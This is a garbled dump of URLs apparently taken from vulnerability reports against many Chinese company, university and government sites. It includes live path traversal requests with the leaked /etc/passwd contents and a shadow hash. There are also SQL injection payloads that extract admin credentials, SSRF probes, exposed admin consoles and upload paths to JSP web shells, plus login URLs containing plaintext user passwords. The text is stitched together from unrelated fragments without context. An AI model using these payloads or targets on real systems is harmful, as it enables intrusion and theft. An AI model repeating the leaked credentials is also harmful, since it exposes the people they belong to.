http://**.**.**.**:1080/device/downExcelexample.action?fileName=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin 
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin web:x:501:501::/usr/local/apache/htdocs/web:/bin/bash joe:x:502:502::/home/joe:/bin/bash zhang:x:503:503::/home/zhang:/bin/bash he:x:504:504::/home/he:/bin/bash ftpuser:x:505:50::/home/ftpuser:/sbin/nologin http://**.**.**.**:1080/device/downExcelexample.action?fileName=../../../../../../../../../../etc/shadow pTEnctVvZlXBQ24BWI3Ay1:16548:0:99999:7 http://**.**.**.**:1080/device/downExcelexample.action?fileName=../../../../../../../../../../etc/hosts http://ggpt.ecnu.edu.cn/ http://ggpt.ecnu.edu.cn/ http://ggpt.ecnu.edu.cn/news1.asp?id=1726&typetitle=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 http://my.9ku.com/love/ifr_login.asp http://202.205.91.108/syzhaopin/showPolicyBulletinDetail.php?type=3&id=45 http://public.qiushibaike.com/login http://**.**.**.**/service_info.php?item=aegogo http://**.**.**.**/service_info.php?item=aegogo http://**.**.**.**:8888/cy/login!login.do http://fax.cofcotunhe.com/ http://**.**.**.**/main.aspx http://**.**.**.**/home.action https://58.56.128.8/tcs/ http://**.**.**.**:99/mail/liming.nsf http://**.**.**.**:9088/csm/csm/CSMFlex.html# http://**.**.**.**:9088/csmst/home.jsp http://218.200.8.66:8080/seeyon//logs/ctp.log http://218.200.8.66:8080/seeyon/ http://denglish.e21.cn/diag/user_myclazz.do;jsessionid=D34619F852B1EF15E0EB4890AA68A335?pageNum=1&pageRows=5&grade=0&bjtype=common http://**.**.**.**/defaultroot/login.jsp http://**.**.**.**/ http://211.150.65.155:7001/ http://223.252.223.246:8080/manager/html encap:Ethernet fa:16:3e:a7:36:bd addr:10.166.224.82 Bcast:10.166.227.255 Mask:255.255.252.0 f816:3eff:fea7:36bd/64 Scope:Link MTU:1400 packets:114430840 packets:101789664 txqueuelen:1000 http://licai.iqianjin.com/ http://licai.iqianjin.com/dede http://**.**.**.**/Page/Login/UserLogin.aspx http://pg.yadea.com.cn/Member/index.php/ http://123.58.179.79/ http://123.58.179.79/ftp encap:Ethernet addr:123.58.179.79 Bcast:123.58.179.255 Mask:255.255.255.0 fe1f:499e/64 Scope:Link MTU:1500 
packets:43826199 packets:12728656 txqueuelen:1000 http://**.**.**.**/main/News/NewsInfo.asp?id=306&ModID=018001 http://**.**.**.**/main/News/NewsInfo.asp?id=306&ModID=018001 http://noa.minxinjituan.com/seeyon/main.do?method=main http://**.**.**.**/seach.php?seach_city=0&search_word=H& http://**.**.**.**/seach.php?seach_city=0&search_word=H& http://**.**.**.**/cn/open.php?aid=506 http://218.58.70.201/haier/ http://**.**.**.**/getpass.jsp?account=user%27&memtype=person http://211.162.119.97:8080/seeyon//logs/ctp.log http://211.162.119.97:8080/seeyon/ http://**.**.**.**/jsp/fgsjj/detail_4_dd.jsp?id=914 http://**.**.**.**/ http://180.169.84.48:7001/travelpre/ https://github.com/frankneu/Perf4jAnalysis/blob/8c5178d23beab37020195dcfbd923864fb63c346/src/com/baidu/perf/main/SendEmail.java http://**.**.**.**/reg.php?F_lang= http://shop.k3cloud.kingdee.com/ http://shop.k3cloud.kingdee.com/show.aspx?type=1&action=GetImg&pids=1 http://218.80.224.36:8080/mics/ http://alarm.fspaej.com http://alarm.fspaej.com/Customer/Check_Detail.aspx?id=1190028 http://boss.ks.91.com/ http://boss.ks.91.com http://218.80.224.42:8080/settlementsys/settlement_flex-debug/settlement_flex.html http://**.**.**.**/ http://**.**.**.** http://www.vrhr.com/ http://easyscholar.ruc.edu.cn http://www.oppo.com/my/r7-plus-preorder/findLocation.php?state=Perak http://**.**.**.**/FileUpload/FCKFile/file/ http://events.oppo.com/2015/neo7-isyana-sarasvati/campaign7/ http://events.oppo.com/2015/neo7-isyana-sarasvati/campaign7/ http://www.chinaums.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://13.0.0.17:8004&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://183.232.32.182/弱口令admin http://app.cmiea.org http://220.231.228.33:6003/axis2/axis2-admin http://202.104.130.162:6003/axis2/axis2-admin http://mail.faw.com.cn/ http://www.cc.ecnu.edu.cn/ http://www.cc.ecnu.edu.cn/news_content.asp?id=77 http://lbs.bjtelecom.net/ http://**.**.**.**/.svn/entries 
www.nsfocus.com http://mail.tv189.com/ http://www.lifetm.com/www.rar http://www.tcldisplay.com/wap/products/search.php?q=1 http://xianchang03.danmu.tudou.com/login.do http://180.169.84.49/ http://**.**.**.**:1046/ http://login.tudou.com/passport/ytLogin.do?loginname=telisabao%40163.com&remember=1&passwd=715917 http://login.tudou.com/passport/ytLogin.do?loginname=1312367040%40qq.com&remember=1&passwd=1233211 http://**.**.**.**/ http://omega.xiaojukeji.com/crash/list?app_id=10000 http://ad.xiaojukeji.com/page/index https://mail.midea.com http://218.244.145.157:81/ http://**.**.**.**/ http://**.**.**.**/cache.php http://**.**.**.**/ http://**.**.**.**/ygr/servlet/MainServer http://passport.18touch.com/4056754 http://www.scude.cc/webpage/news.jsp?na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 http://www.scude.cc/student_s2008/activity/activityView.jsp?id=19673 http://www.scude.cc/student_s2008/studentInfo/studentinfo_view.jsp?id=318 http://www.scude.cc/student_s2008/faq/FAQList.jsp?type=2 http://www.scude.cc/net_register/register/departmentView.jsp?code=01 http://www.scude.cc/scu/xyyw/xyyw.jsp?id=10629 http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/forms.jsp?keyword=&count=50 http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/files.jsp?keyword=&count=50 http://www.scude.cc/student_s2008/faq/FAQ_view.jsp?id=50195 http://www.scude.cc/student_s2008/faq/FAQList.jsp?keyword=&count=50&type=2 http://www.scude.cc/student_s2008/play_article/play_article_layout.jsp?subjectid=4 http://www.scude.cc/student_s2008/play_article/comment_on.jsp?layout_id=41 http://www.scude.cc/student_s2008/play_7/photo_layout.jsp?topage=279&subjectid=7&onclick=2362 http://www.scude.cc/student_s2008/play_7/photo_layout.jsp?topage=279&subjectid=7&onclick=2362 http://114.242.219.245/seeyon//logs/ctp.log http://114.242.219.245/seeyon/ http://www.9libank.com/fund/index.html https://www.airkunming.com/payByOrder?orderNo=TK201401112308561 
https://www.airkunming.com/payByOrder?orderNo=TK201401112308562 http://**.**.**.**/sub/hotelview.asp?hno=182 http://svip.youku.com/pingan/sec https://www.xinliansh.com/js/GetInfoToYK.php http://180.169.84.53:7007 http://**.**.**.**/cja/newscj/newsview.asp?nsid=1736 http://**.**.**.**/product.php?id=66 http://votegd.gridinn.com/uc_server/ http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185&pkeys=homecity%2Ccity_searchfilter_13%2Ccity_searchfilter_132&dispathChannel=xiaozhu&userId=1823761635 http://**.**.**.**/co_content_disp.asp?xid=3676 http://**.**.**.**/News/view.asp?id=18 http://oa.sinopharm.com/seeyon/index.jsp http://**.**.**.**/console/ http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1问题页面,可GET注入,过滤了空格要使用脚本。 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://oa.cofco-keystone.com http://**.**.**.**/login.aspx http://**.**.**.** http://e.zznissan.com.cn/vehiclescontrast_4.html,将车辆对比抓包得到 http://e.zznissan.com.cn/ajax_models_price.php?modelsId=304网址,存在注入 http://**.**.**.**/user/register.screen http://www.jsdzjg.com/caselist.php?sort_id=1 http://**.**.**.**/category?cid=1 http://**.**.**.**/products?pid=7798 http://**.**.**.**/category?mid=2 http://**.**.**.**:81/ http://**.**.**.**:81/ClinicRecord/PrintInfusion.aspx?DealSN=296451 http://106.3.36.125/dbws/home/login/login.html http://**.**.**.**:8000/ http://www.coolpad.com/member/memberAddressAction!saveAddreass.do http://**.**.**.**/ http://xiaobeike.creditease.cn/ username:admin http://news.taoming.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://news.taoming.com/data/mysql_error_trace.inc http://news.taoming.com/myad/ http://**.**.**.**/ 
http://www.flywayex.com/ch/shangchuanzhengjian/处 http://www.flywayex.com/IDCard_Pic/0_3361451.jpg http://**.**.**.**/index.do http://**.**.**.**/ http://**.**.**.**:8080/elmah.axd http://arc.ecnu.edu.cn/ http://**.**.**.**/default.aspx http://**.**.**.**/emportal/ http://**.**.**.**/emportal/login.jsp http://**.**.**.**/emportal/frame.jsp http://oa.mszq.com.cn/lks/koa/lks_workplace.nsf?open http://sxfw.ecpic.com.cn/lifeebiz/a2/pos/Counseling/reportcaselogin.do http://union.alicall.com/union.rar http://www.alicall.com http://**.**.**.**/step1.action http://s.ziroom.com/crm/contractInfo/getCustomerByContractCode http://**.**.**.**/ http://**.**.**.**/news_info.asp?newsid=1 http://**.**.**.**:81/gsservice/AnswerNotice/more.aspx?keyword=%C8%CB%CE%C4%BF%C6%D1%A7%D1%A7%B2%BF http://**.**.**.**:81/gsservice/AnswerNotice/detail.aspx?title=%C9%FA%BB%EE%D5%FE%D6%CE%B5%C4%CE%C4%D1%A7%B1%ED%D5%F7%D2%D4%D0%C2%CA%C0%BC%CD%D0%A1%CB%B5%CE%AA%D6%D0%D0%C4 http://www.tjjt.tongji.edu.cn:80/jtxxkz/net/foreground/searchList.jsp http://**.**.**.**/jc6/platform/sys/login!intro.action http://ss.pkusz.edu.cn/ http://ss.pkusz.edu.cn http://**.**.**.**/computer/database/ http://**.**.**.**/computer/UpFiles/index1.aspx http://**.**.**.**/allSearch.php http://**.**.**.**/allSearch.php http://**.**.**.**/builder.php?cname=PbQx&assortment_id=1 http://**.**.**.**/builder.php?cname=PbQx&assortment_id=1 http://newoa.glsc.com.cn:8082/glsc/mainpage.nsf?open http://**.**.**.**/gzws/index_65.aspx?lcid=17324 http://**.**.**.**/chuangxian/show.php?id=247&type=15 http://**.**.**.**/chuangxian/show.php?id=247&type=15 http://**.**.**.**/system/default.asp http://**.**.**.**/UploadFiles/201512317955263.cer http://el.tju.edu.cn/portal/xlogin http://**.**.**.**/mailindex.nsf http://**.**.**.**/whoarewe_mapfre.html http://**.**.**.**/ http://user.iiyi.com:80 user.iiyi.com/center/friend/get_relation http://**.**.**.**/w_xwzx/show_news.jsp?noteid=348 http://**.**.**.**/news/NewsDetails.aspx?nid=10000377 
http://**.**.**.**/news/NewsDetails.aspx?nid=10000377 http://**.**.**.**/invoker/JMXInvokerServlet http://**.**.**.**/news-x.php?tid=179&id=515 http://61.163.78.6:8080/yyoa/ http://**.**.**.**/shopping/ http://**.**.**.**/shopping/ http://59.151.39.85:7001/console http://www.sinopharmsx.com:8181/server_platform/Order_login.do http://**.**.**.**/bugs/wooyun-2010-0137980 http://m.sto.cn:8080/StoAppPro/RetrievePassword?mobileNo=18888888888&verifyCode=1028&newPassword=426542bc41159426e113fcce74b07d84 http://wooyun.org/bugs/wooyun-2010-0145512 http://wooyun.org/bugs/wooyun-2010-0156362 http://**.**.**.**/tc/news_detail.php?id=28 http://**.**.**.**/isgp/yieldn.asp?lk=007HO07560%27%20and%200%3C%3E%28select%20db_name%28%29%29%20-- http://j2e.koolearn.com/homePL.php?PL=whatIsBackDRAFT&THID=1 http://**.**.**.**:8000/logonAction.do http://**.**.**.**:8000/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&xh=6&dwbm=00100000370&sbwzly=0 http://vip.jiayuan.com/broker/?tag=1 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8080 http://q.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://mei.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://tao.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://v.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://weixiu.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://review.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://huishou.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://mei.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://q.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://mei.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.58.22.189:7003&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search 
http://q.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.58.50.19:7023&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://shuo.rayli.com.cn http://180.169.84.62:8082 http://180.169.84.62:8082/proposalproxy/index.jsp http://180.169.84.62:8082/cK/foot.jsp http://chick.gongfubb.com/chick3/m/ http://chick.gongfubb.com/chick3/m/?ACT=C2 http://chick.gongfubb.com/chick3/m/?ACT=G0 http://chick.gongfubb.com/chick3/m/?ACT=B0 http://chick.gongfubb.com/chick3/m/x_jump.php?UID=32139503 http://chick.gongfubb.com/chick3/m/history.php?UID=1199840 http://chick.gongfubb.com/chick3/m/?ACT=G1&PAD=0&EID=18 http://e.mosh.cn/user/ajaxcheckusererr http://e.mosh.cn/user/dologin http://e.mosh.cn/user/dofindpwd http://e.mosh.cn/user/resendmsg http://1.85.2.244/ http://1.85.2.244/console http://vod.koolearn.com/ http://**.**.**.**/ http://**.**.**.**/news/downLoad.jsp?filePath=../../../../../../../../../../etc/passwd%00.pdf http://www.newv.com.cn/case_enterprise.html http://www.newv.com.cn/case_college.html http://www.newv.com.cn/case_government.html http://elearning.dahuatech.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://live.lifan.net//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.190.166.50:89/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://www.dlzhifeng.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://218.61.202.30:8080//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.191.246.18:8888/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://dskc.nenu.edu.cn//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://exam.ecustmde.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://volvo.infolearning.so/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://elearning.900950.com//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://exam.qdgw.edu.cn/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 
http://exp.chinaopenschool.com/kl/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://rlk.chinaopenschool.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://61.186.173.202:8088/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://222.195.242.203/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://wk185.wangkao.sczsxx.org/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://www.chinaopenschool.com/gsedu_admin/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://chrysler.infolearning.so/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://180.166.112.32/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://211.155.225.155/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://211.147.233.3/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://cpe.hongjingedu.com//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://edu-f.gcl-power.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://elearning.dahuatech.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://live.lifan.net/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.190.166.50:89/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.191.246.18:8888/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://www.dlzhifeng.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://elearning.900950.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://218.61.202.30:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://dskc.nenu.edu.cn/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://219.144.128.183:9999/cloud/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://exam.ecustmde.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://**.**.**.**/~twvs/teach/teach_detail.php?teach_no=3 http://**.**.**.**/~twvs/teach/teach_detail.php?teach_no=3 http://**.**.**.**:8098/ http://**.**.**.**:8098/ntbookretrset.aspx?Pin=1 http://bbs.mztgame.com/data 
http://202.108.103.169/manage/login.action的命令执行是已经修复了,现在厂商直接把这个系统移到了其它服务器,而原本在202.108.103.169此服务器上的华泰微信端确没有人提出命令执行,而且厂商根本没意识到要补这个漏洞,所以我觉得是不算重复的) http://202.108.103.169/htweixin http://202.108.103.169/htweixin/pages/taobao/taobaonumberAction!taobaoordernumber http://202.108.103.169/htweixin/pages/taobao/taobaonumberAction!taobaoordernumber pwd:123456 http://www.cctvfinance.com/hangqing/archives?typeid=25 http://**.**.**.**/slp/v2_act_info_show.php?web_id=74 http://**.**.**.**/article.jsp?op=op_browse&record_id=19379060 http://**.**.**.**/article.jsp?op=op_browse&record_id=19379060 http://store.qbao.com/app/shareEmpty/share?appId=447&shareChannel=qbao&pid=31330779 http://**.**.**.**/ http://60.191.59.19:8080/index122.html http://tdjxxy.tju.edu.cn/staff.html?uid=1734 http://**.**.**.**/view/viewdetail.php?docid=154805 http://**.**.**.**/bugs/wooyun-2010-0106385 http://**.**.**.**:8089/ http://**.**.**.**/coremail/index.jsp http://**.**.**.**/vip/login.aspx http://**.**.**.**/Admin/Login.aspx https://mail.xdf.cn http://**.**.**.**/email_detail.jsp?id=bcf53d59e012406cbb3b0642d2b7cf6f https://**.**.**.**/hwf452/efb/blob/ab34ce57c1c94d32f4c40ac64a49a0851e1ea7ae/efb/build/classes/jdbc.properties http://**.**.**.**/slmwebapp/UserManagerAction_checkUser.do http://**.**.**.**/slmwebapp/UserManagerAction_checkUser.do http://**.**.**.**/manager/ http://**.**.**.**/hotlink/hotlinks.aspx?kid=&cols=5 http://sjds.cctvcjw.com/CCTVinfo/Details.aspx?id=140023&news_type_id=0104 http://59.151.39.90/indexlis.jsp http://59.151.39.90/common/easyQueryVer3/EasyQueryXML.jsp http://59.151.39.90 www.cofco-property.cn/iframe.aspx?id=1* http://wooyun.org/bugs/wooyun-2010-036553 www.cofco-property.cn/iframe.aspx?id=1* http://oa.superjia.com/ http://**.**.**.**/search/login.php http://tuanwei.nwu.edu.cn/tscms/paper.php?id=136&p=2 http://**.**.**.**/ec/oldpolicy/oldpolicy_into.action http://kusgm.kongzhong.com/count.php?pageurl=http%3A//kf.kongzhong.com/&referer=&website=1 
http://60.10.8.227:88/web/careerapply/HrmCareerApplyWorkView.jsp?id=1%20union%20select%201,2,3,4,5,@@version http://www.wasu.com.cn/admin/ http://m.sfn.cn/admin/ http://oa.gaosiedu.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://www.xxoo.com/null上传的文件名.jsp http://oa.gaosiedu.com/nulljspspy.jsp?o=index http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.**/bugs/wooyun-2010-0106778 http://www.kysec.cn/qk/tools/Main.aspx http://www.kysec.cn/qk/tools/main.aspx?path=/../ http://ttf.ecnu.edu.cn/ http://ttf.ecnu.edu.cn http://118.122.88.90:60465/nulljsp1.jsp http://118.122.88.90:60465/tools/SWFUpload/upload.jsp height:20px;BORDER http://www.xxoo.com/null上传的文件名.jsp http://**.**.**.**:80/ http://xml.rayli.com.cn/article/search.php?tag=-1 http://**.**.**.** HTTP://life.ufh.com.cn/list5.php?ch=50&a_id=5 http://**.**.**.**:18080/ssoserver/static/login.html http://**.**.**.**:81 http://tbp.cheyipai.com/Auction/Index/440300 http://**.**.**.**/aboutUsDetail.php?id=1 http://mail.kysec.cn http://www.fjtlzf.com/?phpinfo=1 http://www.fjtlzf.com/tonglianzhifu/ http://www.muzhiwan.com/index.php?action=common&opt=searchHistroy&vid= http://mech.upc.edu.cn/ http://mech.upc.edu.cn http://www.sy.e21.cn:8080/Portal/Login.aspx?r=0.926470052683726 http://e.cheyipai.com/WebController/Order/getBidDetails http://e.cheyipai.com http://sta.upc.edu.cn/ http://sta.upc.edu.cn http://office.galaxyasset.com/ http://office.galaxyasset.com/web/careerapply/HrmCareerApplyWorkEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6 http://office.mingyi.com.cn/txl/manage/Manage_list.aspx http://office.mingyi.com.cn/txl/manage/Manage_add.aspx http://hq.fruitday.com:88/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://96371.wasu.com/index.do http://www.sky-dome.com.cn/dede/index.php http://jspx.sicnu.edu.cn/msggl.do?currentpage=1&method=getMsgPages&pagesize=10&type=-1 http://www.hehuoren.com/sk15.php http://**.**.**.**/bugs/wooyun-2015-0156617 
http://tb.koolearn.com/ http://tb.koolearn.com/index/lsub?username=a&password=s&checkbox=0 http://jpkc.e21.cn/ http://**.**.**.**/news/news1.php?id=2 http://**.**.**.**/news/news1.php?id=2%20and%201=2%20UNION%20SELECT%201,2,user%28%29,4,5,6,7,8,9,10 http://**.**.**.**/downproject.php?u=../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin www:x:80:80::/home/www:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin vizz:x:507:509::/home/vizz:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin myiconlight:x:103:80:**.**.**.**:/export/web/myiconlight:/sbin/nologin mysql:x:508:508::/usr/local/mysql:/sbin/nologin 
gino:x:502:500::/export/web/gino:/bin/bash swsd2010:x:2653:80::/export/web/swsd2010:/bin/sh alias:x:2654:510::/var/qmail/alias:/sbin/nologin qmaild:x:2655:510::/var/qmail:/sbin/nologin qmaill:x:2656:510::/var/qmail:/sbin/nologin qmailp:x:2657:510::/var/qmail:/sbin/nologin qmailq:x:2658:511::/var/qmail:/sbin/nologin qmailr:x:2659:511::/var/qmail:/sbin/nologin qmails:x:2660:511::/var/qmail:/sbin/nologin aster:x:2534:80:**.**.**.**:/export/web/aster:/bin/sh wincalpharm:x:2860:80:**.**.**.**:/export/web/wincalpharm:/sbin/nologin dejohk:x:2862:80:**.**.**.**:/export/web/dejohk:/sbin/nologin worldlinkhk:x:2864:80:**.**.**.**:/export/web/worldlinkhk:/sbin/nologin outdoorproducts:x:2867:80:**.**.**.**:/export/web/outdoorproducts:/sbin/nologin joannshe:x:2869:80:**.**.**.**:/export/web/joannshe:/bin/sh synergytechhk:x:2872:80:**.**.**.**:/export/web/synergytechhk:/sbin/nologin keibert:x:2873:80:**.**.**.**:/export/web/keibert:/sbin/nologin healthguardcn:x:2875:80:**.**.**.**:/export/web/healthguardcn:/sbin/nologin colroot:x:2876:80:**.**.**.**:/export/web/colroot:/sbin/nologin cm2square:x:2878:80:**.**.**.**:/export/web/cm2square:/sbin/nologin damoorghk:x:2882:80:**.**.**.**:/export/web/damoorghk:/sbin/nologin taicohk:x:2884:80:**.**.**.**:/export/web/taicohk:/sbin/nologin sideways:x:2888:80:**.**.**.**:/export/web/sideways:/sbin/nologin timwaytest:x:2889:80:**.**.**.**:/export/web/timwaytest:/sbin/nologin freeformoptical:x:2893:80:**.**.**.**:/export/web/freeformoptical:/sbin/nologin jollykingdom:x:2894:80:**.**.**.**:/export/web/jollykingdom:/sbin/nologin angelgrace:x:2902:80:**.**.**.**:/export/web/angelgrace:/sbin/nologin searcheasy:x:2903:80:**.**.**.**:/export/web/searcheasy:/sbin/nologin heijkoopinvest:x:2906:80:**.**.**.**:/export/web/heijkoopinvest:/sbin/nologin cedhk:x:2912:80:**.**.**.**:/export/web/cedhk:/sbin/nologin chinapromotion:x:2917:80:**.**.**.**:/export/web/chinapromotion:/bin/sh chikahk:x:2918:80:**.**.**.**:/export/web/chikahk:/sbin/nologin 
